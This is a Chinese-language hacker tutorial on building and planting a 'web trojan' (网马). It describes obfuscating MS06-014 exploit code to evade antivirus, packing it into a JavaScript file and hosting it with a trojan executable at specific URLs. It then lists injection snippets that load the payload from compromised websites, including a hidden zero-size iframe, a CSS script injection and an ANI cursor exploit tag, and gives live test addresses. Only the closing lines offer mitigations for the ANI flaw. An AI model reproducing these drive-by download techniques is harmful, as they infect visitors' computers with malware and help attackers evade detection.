网马的详细制作教程

本节讲 如何制作网马[挂到网站上可以传播木马等病毒程序]

本次教程名称：网马的详细制作

本次教程操作系统：Microsoft Windows XP

本次教程用到工具：1 网马一个

                  2 免杀工具

                  3 空间一个

MS06014网马的代码

我们做下修改 我就不做详细修改了，这样做就是为了免杀！不在范围之内

http://123.00175.com/lang/ceshiyong.exe 这个是你木马的下载地址

这几步大家看操作就行了！~

这里注意：我们只要八进制的就OK了

我们把转换成的八进制复制到eval("  八进制代码  ") 保存为js格式

CScript /nologo pack.wsf 2.js >> 12.js  将2.js用pack.wsf转换成 12.js

这样这个12.js就是我们做的网马文件了[免不免杀我就不知道了]

下面要把这个12.js和我们的程序ceshiyong.exe 传到空间中

http://123.00175.com/lang/12.js 这个就是我们传的地址！

然后看下面的代码，都是挂马的代码

我们来测试下看看哦！~不记得我补丁打没打了，嘿嘿

应该打了补丁了！

再来看下别的网马ani漏洞网马

再来测试下，呵呵补丁我全打上了，这个测试地址我暂时不删，大家如果有兴趣可以自己测试

如果出来这个程序，说明你的补丁就没打上了！呵呵，还有可能是 被你机子上的杀毒给杀了

<iframe src="地址" width="0" height="0"></iframe>

css挂马

body {
background-image: url('javascript:document.write("<script src="js地址"></script>")')
}

<script src="js地址"></script>

js内容

document.write("<iframe src="地址" width="0" height="0"></iframe>")；

微软动画光标漏洞ani挂的代码

<DIV style="CURSOR: url('http://123.00175.com/lang/wwin.jpg')"></DIV>


我刚刚做的二个测试地址：
http://123.00175.com/lang/
http://123.00175.com/12.asp


微软动画光标漏洞临时解决方法
2007-04-04
临时解决方法1：
地“开始”菜单“运行”里输入"gpedit.msc"
在后在“本地计算机”策略 => 用户配置 => 管理模板 => 系统 => 停止命令提示符 设置为“启用”!
并把“他停用命令提示符脚本处理吗”选为“是”，再按确定！

临时解决方法2：
设置
C:\Documents and Settings\Administrator\Local Settings
目录的权限设置为不能运行！ Administrator 是你的用户目录





BY 华夏黑客联盟[http://www.hxhack.com]